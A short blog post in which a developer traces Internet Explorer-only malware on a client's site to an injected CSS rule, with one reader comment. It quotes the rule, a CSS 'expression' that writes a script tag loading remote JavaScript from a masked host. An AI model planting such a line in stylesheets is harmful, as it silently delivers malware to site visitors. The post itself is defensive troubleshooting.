We’ve been playing the role of super-sleuths today, to try and work out why a client’s website was not working.
All was fine in Firefox and other normal browers, but anybody visiting using IE (any version) got a malicious little javascript loading up an iframe with lots of other unwanted malware within it.
Checking the actual pages themselves gave no clues - there was no javascript other than the javascript I put there. A couple of minutes thinking, and we realised that the css file was the only common element to each page.
Downloading the css file, this is what we found:
html { width: expression(document.write(”<script type=text/javascript src=http://XXXXXXXX.com/9bc7b2e1.js></script>”)); }
… which explains why it only hit IE (’expression’ being a proprietary Internet Explorer thing). Luckily in this case, it wasn’t a massive css file, so this kind of stood out. If you’re experiencing similar issues, then look out for this.
Now, just need to work out how the critters put it there…
My guess would be weak passwords but hey, I’m sure there are some exploits out there for some plugins too.
Some good points in this article. Encouraging to see blogging actually worthy of a read. Keep up the efforts…